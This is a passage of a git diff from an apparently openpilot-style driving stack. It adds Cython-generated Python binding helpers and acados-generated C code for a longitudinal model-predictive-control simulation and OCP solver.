PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ + #if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so index 3c4fb46df..9977669de 100755 Binary files a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so and b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so differ diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_sim_solver_long.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_sim_solver_long.c new file mode 100644 index 000000000..20f8890fc --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_sim_solver_long.c @@ -0,0 +1,282 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ +// standard +#include +#include + +// acados +#include "acados_c/external_function_interface.h" +#include "acados_c/sim_interface.h" +#include "acados_c/external_function_interface.h" + +#include "acados/sim/sim_common.h" +#include "acados/utils/external_function_generic.h" +#include "acados/utils/print.h" + + +// example specific +#include "long_model/long_model.h" +#include "acados_sim_solver_long.h" + + +// ** solver data ** + +sim_solver_capsule * long_acados_sim_solver_create_capsule() +{ + void* capsule_mem = malloc(sizeof(sim_solver_capsule)); + sim_solver_capsule *capsule = (sim_solver_capsule *) capsule_mem; + + return capsule; +} + + +int long_acados_sim_solver_free_capsule(sim_solver_capsule * capsule) +{ + free(capsule); + return 0; +} + + +int long_acados_sim_create(sim_solver_capsule * capsule) +{ + // initialize + const int nx = LONG_NX; + const int nu = LONG_NU; + const int nz = LONG_NZ; + const int np = LONG_NP; + bool tmp_bool; + + + double Tsim = 0.06944444444444445; + + + // explicit ode + capsule->sim_forw_vde_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)); + capsule->sim_expl_ode_fun_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)); + + capsule->sim_forw_vde_casadi->casadi_fun = &long_expl_vde_forw; + capsule->sim_forw_vde_casadi->casadi_n_in = &long_expl_vde_forw_n_in; + capsule->sim_forw_vde_casadi->casadi_n_out = &long_expl_vde_forw_n_out; + capsule->sim_forw_vde_casadi->casadi_sparsity_in = &long_expl_vde_forw_sparsity_in; + capsule->sim_forw_vde_casadi->casadi_sparsity_out = &long_expl_vde_forw_sparsity_out; + capsule->sim_forw_vde_casadi->casadi_work = &long_expl_vde_forw_work; + external_function_param_casadi_create(capsule->sim_forw_vde_casadi, np); + + capsule->sim_expl_ode_fun_casadi->casadi_fun = &long_expl_ode_fun; + capsule->sim_expl_ode_fun_casadi->casadi_n_in = &long_expl_ode_fun_n_in; + capsule->sim_expl_ode_fun_casadi->casadi_n_out = &long_expl_ode_fun_n_out; + capsule->sim_expl_ode_fun_casadi->casadi_sparsity_in = &long_expl_ode_fun_sparsity_in; + capsule->sim_expl_ode_fun_casadi->casadi_sparsity_out = &long_expl_ode_fun_sparsity_out; + capsule->sim_expl_ode_fun_casadi->casadi_work = &long_expl_ode_fun_work; + external_function_param_casadi_create(capsule->sim_expl_ode_fun_casadi, np); + + + + // sim plan & config + sim_solver_plan_t plan; + plan.sim_solver = ERK; + + // create correct config based on plan + sim_config * long_sim_config = sim_config_create(plan); + capsule->acados_sim_config = long_sim_config; + + // sim dims + void *long_sim_dims = sim_dims_create(long_sim_config); + capsule->acados_sim_dims = long_sim_dims; + sim_dims_set(long_sim_config, long_sim_dims, "nx", &nx); + sim_dims_set(long_sim_config, long_sim_dims, "nu", &nu); + sim_dims_set(long_sim_config, long_sim_dims, "nz", &nz); + + + // sim opts + sim_opts *long_sim_opts = sim_opts_create(long_sim_config, long_sim_dims); + capsule->acados_sim_opts = long_sim_opts; + int tmp_int = 3; + sim_opts_set(long_sim_config, long_sim_opts, "newton_iter", &tmp_int); + sim_collocation_type collocation_type = GAUSS_LEGENDRE; + sim_opts_set(long_sim_config, long_sim_opts, "collocation_type", &collocation_type); + + + tmp_int = 4; + sim_opts_set(long_sim_config, long_sim_opts, "num_stages", &tmp_int); + tmp_int = 1; + sim_opts_set(long_sim_config, long_sim_opts, "num_steps", &tmp_int); + tmp_bool = 0; + sim_opts_set(long_sim_config, long_sim_opts, "jac_reuse", &tmp_bool); + + + // sim in / out + sim_in *long_sim_in = sim_in_create(long_sim_config, long_sim_dims); + capsule->acados_sim_in = long_sim_in; + sim_out *long_sim_out = sim_out_create(long_sim_config, long_sim_dims); + capsule->acados_sim_out = long_sim_out; + + sim_in_set(long_sim_config, long_sim_dims, + long_sim_in, "T", &Tsim); + + // model functions + long_sim_config->model_set(long_sim_in->model, + "expl_vde_for", capsule->sim_forw_vde_casadi); + long_sim_config->model_set(long_sim_in->model, + "expl_ode_fun", capsule->sim_expl_ode_fun_casadi); + + // sim solver + sim_solver *long_sim_solver = sim_solver_create(long_sim_config, + long_sim_dims, long_sim_opts); + capsule->acados_sim_solver = long_sim_solver; + + + /* initialize parameter values */ + double* p = calloc(np, sizeof(double)); + + p[0] = -1.2; + p[1] = 1.2; + p[4] = 1.45; + p[5] = 0.75; + + long_acados_sim_update_params(capsule, p, np); + free(p); + + + /* initialize input */ + // x + double x0[3]; + for (int ii = 0; ii < 3; ii++) + x0[ii] = 0.0; + + sim_in_set(long_sim_config, long_sim_dims, + long_sim_in, "x", x0); + + + // u + double u0[1]; + for (int ii = 0; ii < 1; ii++) + u0[ii] = 0.0; + + sim_in_set(long_sim_config, long_sim_dims, + long_sim_in, "u", u0); + + // S_forw + double S_forw[12]; + for (int ii = 0; ii < 12; ii++) + S_forw[ii] = 0.0; + for (int ii = 0; ii < 3; ii++) + S_forw[ii + ii * 3 ] = 1.0; + + + sim_in_set(long_sim_config, long_sim_dims, + long_sim_in, "S_forw", S_forw); + + int status = sim_precompute(long_sim_solver, long_sim_in, long_sim_out); + + return status; +} + + +int long_acados_sim_solve(sim_solver_capsule *capsule) +{ + // integrate dynamics using acados sim_solver + int status = sim_solve(capsule->acados_sim_solver, + capsule->acados_sim_in, capsule->acados_sim_out); + if (status != 0) + printf("error in long_acados_sim_solve()! Exiting.\n"); + + return status; +} + + +int long_acados_sim_free(sim_solver_capsule *capsule) +{ + // free memory + sim_solver_destroy(capsule->acados_sim_solver); + sim_in_destroy(capsule->acados_sim_in); + sim_out_destroy(capsule->acados_sim_out); + sim_opts_destroy(capsule->acados_sim_opts); + sim_dims_destroy(capsule->acados_sim_dims); + sim_config_destroy(capsule->acados_sim_config); + + // free external function + external_function_param_casadi_free(capsule->sim_forw_vde_casadi); + external_function_param_casadi_free(capsule->sim_expl_ode_fun_casadi); + + return 0; +} + + +int long_acados_sim_update_params(sim_solver_capsule *capsule, double *p, int np) +{ + int status = 0; + int casadi_np = LONG_NP; + + if (casadi_np != np) { + printf("long_acados_sim_update_params: trying to set %i parameters for external functions." + " External function has %i parameters. Exiting.\n", np, casadi_np); + exit(1); + } + capsule->sim_forw_vde_casadi[0].set_param(capsule->sim_forw_vde_casadi, p); + capsule->sim_expl_ode_fun_casadi[0].set_param(capsule->sim_expl_ode_fun_casadi, p); + + return status; +} + +/* getters pointers to C objects*/ +sim_config * long_acados_get_sim_config(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_config; +}; + +sim_in * long_acados_get_sim_in(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_in; +}; + +sim_out * long_acados_get_sim_out(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_out; +}; + +void * long_acados_get_sim_dims(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_dims; +}; + +sim_opts * long_acados_get_sim_opts(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_opts; +}; + +sim_solver * long_acados_get_sim_solver(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_solver; +}; + diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_long.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_long.c new file mode 100644 index 000000000..7b28e0206 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_long.c @@ -0,0 +1,1012 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + +// standard +#include +#include +#include +// acados +// #include "acados/utils/print.h" +#include "acados_c/ocp_nlp_interface.h" +#include "acados_c/external_function_interface.h" + +// example specific +#include "long_model/long_model.h" + + + +#include "long_constraints/long_h_constraint.h" + + +#include "long_cost/long_cost_y_fun.h" +#include "long_cost/long_cost_y_0_fun.h" +#include "long_cost/long_cost_y_e_fun.h" + +#include "acados_solver_long.h" + +#define NX LONG_NX +#define NZ LONG_NZ +#define NU LONG_NU +#define NP LONG_NP +#define NBX LONG_NBX +#define NBX0 LONG_NBX0 +#define NBU LONG_NBU +#define NSBX LONG_NSBX +#define NSBU LONG_NSBU +#define NSH LONG_NSH +#define NSG LONG_NSG +#define NSPHI LONG_NSPHI +#define NSHN LONG_NSHN +#define NSGN LONG_NSGN +#define NSPHIN LONG_NSPHIN +#define NSBXN LONG_NSBXN +#define NS LONG_NS +#define NSN LONG_NSN +#define NG LONG_NG +#define NBXN LONG_NBXN +#define NGN LONG_NGN +#define NY0 LONG_NY0 +#define NY LONG_NY +#define NYN LONG_NYN +// #define N LONG_N +#define NH LONG_NH +#define NPHI LONG_NPHI +#define NHN LONG_NHN +#define NPHIN LONG_NPHIN +#define NR LONG_NR + + +// ** solver data ** + +long_solver_capsule * long_acados_create_capsule(void) +{ + void* capsule_mem = malloc(sizeof(long_solver_capsule)); + long_solver_capsule *capsule = (long_solver_capsule *) capsule_mem; + + return capsule; +} + + +int long_acados_free_capsule(long_solver_capsule *capsule) +{ + free(capsule); + return 0; +} + + +int long_acados_create(long_solver_capsule* capsule) +{ + int N_shooting_intervals = LONG_N; + double* new_time_steps = NULL; // NULL -> don't alter the code generated time-steps + return long_acados_create_with_discretization(capsule, N_shooting_intervals, new_time_steps); +} + + +int long_acados_update_time_steps(long_solver_capsule* capsule, int N, double* new_time_steps) +{ + if (N != capsule->nlp_solver_plan->N) { + fprintf(stderr, "long_acados_update_time_steps: given number of time steps (= %d) " \ + "differs from the currently allocated number of " \ + "time steps (= %d)!\n" \ + "Please recreate with new discretization and provide a new vector of time_stamps!\n", + N, capsule->nlp_solver_plan->N); + return 1; + } + + ocp_nlp_config * nlp_config = capsule->nlp_config; + ocp_nlp_dims * nlp_dims = capsule->nlp_dims; + ocp_nlp_in * nlp_in = capsule->nlp_in; + + for (int i = 0; i < N; i++) + { + ocp_nlp_in_set(nlp_config, nlp_dims, nlp_in, i, "Ts", &new_time_steps[i]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "scaling", &new_time_steps[i]); + } + return 0; +} + +/** + * Internal function for long_acados_create: step 1 + */ +void long_acados_create_1_set_plan(ocp_nlp_plan_t* nlp_solver_plan, const int N) +{ + assert(N == nlp_solver_plan->N); + + /************************************************ + * plan + ************************************************/ + nlp_solver_plan->nlp_solver = SQP_RTI; + + nlp_solver_plan->ocp_qp_solver_plan.qp_solver = PARTIAL_CONDENSING_HPIPM; + + nlp_solver_plan->nlp_cost[0] = NONLINEAR_LS; + for (int i = 1; i < N; i++) + nlp_solver_plan->nlp_cost[i] = NONLINEAR_LS; + + nlp_solver_plan->nlp_cost[N] = NONLINEAR_LS; + + for (int i = 0; i < N; i++) + { + nlp_solver_plan->nlp_dynamics[i] = CONTINUOUS_MODEL; + nlp_solver_plan->sim_solver_plan[i].sim_solver = ERK; + } + + for (int i = 0; i < N; i++) + {nlp_solver_plan->nlp_constraints[i] = BGH; + } + nlp_solver_plan->nlp_constraints[N] = BGH; +} + + +/** + * Internal function for long_acados_create: step 2 + */ +ocp_nlp_dims* long_acados_create_2_create_and_set_dimensions(long_solver_capsule* capsule) +{ + ocp_nlp_plan_t* nlp_solver_plan = capsule->nlp_solver_plan; + const int N = nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + + /************************************************ + * dimensions + ************************************************/ + #define NINTNP1MEMS 17 + int* intNp1mem = (int*)malloc( (N+1)*sizeof(int)*NINTNP1MEMS ); + + int* nx = intNp1mem + (N+1)*0; + int* nu = intNp1mem + (N+1)*1; + int* nbx = intNp1mem + (N+1)*2; + int* nbu = intNp1mem + (N+1)*3; + int* nsbx = intNp1mem + (N+1)*4; + int* nsbu = intNp1mem + (N+1)*5; + int* nsg = intNp1mem + (N+1)*6; + int* nsh = intNp1mem + (N+1)*7; + int* nsphi = intNp1mem + (N+1)*8; + int* ns = intNp1mem + (N+1)*9; + int* ng = intNp1mem + (N+1)*10; + int* nh = intNp1mem + (N+1)*11; + int* nphi = intNp1mem + (N+1)*12; + int* nz = intNp1mem + (N+1)*13; + int* ny = intNp1mem + (N+1)*14; + int* nr = intNp1mem + (N+1)*15; + int* nbxe = intNp1mem + (N+1)*16; + + for (int i = 0; i < N+1; i++) + { + // common + nx[i] = NX; + nu[i] = NU; + nz[i] = NZ; + ns[i] = NS; + // cost + ny[i] = NY; + // constraints + nbx[i] = NBX; + nbu[i] = NBU; + nsbx[i] = NSBX; + nsbu[i] = NSBU; + nsg[i] = NSG; + nsh[i] = NSH; + nsphi[i] = NSPHI; + ng[i] = NG; + nh[i] = NH; + nphi[i] = NPHI; + nr[i] = NR; + nbxe[i] = 0; + } + + // for initial state + nbx[0] = NBX0; + nsbx[0] = 0; + ns[0] = NS - NSBX; + nbxe[0] = 3; + ny[0] = NY0; + + // terminal - common + nu[N] = 0; + nz[N] = 0; + ns[N] = NSN; + // cost + ny[N] = NYN; + // constraint + nbx[N] = NBXN; + nbu[N] = 0; + ng[N] = NGN; + nh[N] = NHN; + nphi[N] = NPHIN; + nr[N] = 0; + + nsbx[N] = NSBXN; + nsbu[N] = 0; + nsg[N] = NSGN; + nsh[N] = NSHN; + nsphi[N] = NSPHIN; + + /* create and set ocp_nlp_dims */ + ocp_nlp_dims * nlp_dims = ocp_nlp_dims_create(nlp_config); + + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nx", nx); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nu", nu); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nz", nz); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "ns", ns); + + for (int i = 0; i <= N; i++) + { + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbx", &nbx[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbu", &nbu[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsbx", &nsbx[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsbu", &nsbu[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "ng", &ng[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsg", &nsg[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbxe", &nbxe[i]); + } + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, 0, "ny", &ny[0]); + for (int i = 1; i < N; i++) + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, i, "ny", &ny[i]); + + for (int i = 0; i < N; i++) + { + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nh", &nh[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsh", &nsh[i]); + } + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, N, "nh", &nh[N]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, N, "nsh", &nsh[N]); + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, N, "ny", &ny[N]); + free(intNp1mem); +return nlp_dims; +} + + +/** + * Internal function for long_acados_create: step 3 + */ +void long_acados_create_3_create_and_set_functions(long_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + + /************************************************ + * external functions + ************************************************/ + +#define MAP_CASADI_FNC(__CAPSULE_FNC__, __MODEL_BASE_FNC__) do{ \ + capsule->__CAPSULE_FNC__.casadi_fun = & __MODEL_BASE_FNC__ ;\ + capsule->__CAPSULE_FNC__.casadi_n_in = & __MODEL_BASE_FNC__ ## _n_in; \ + capsule->__CAPSULE_FNC__.casadi_n_out = & __MODEL_BASE_FNC__ ## _n_out; \ + capsule->__CAPSULE_FNC__.casadi_sparsity_in = & __MODEL_BASE_FNC__ ## _sparsity_in; \ + capsule->__CAPSULE_FNC__.casadi_sparsity_out = & __MODEL_BASE_FNC__ ## _sparsity_out; \ + capsule->__CAPSULE_FNC__.casadi_work = & __MODEL_BASE_FNC__ ## _work; \ + external_function_param_casadi_create(&capsule->__CAPSULE_FNC__ , 6); \ + }while(false) + + + // constraints.constr_type == "BGH" and dims.nh > 0 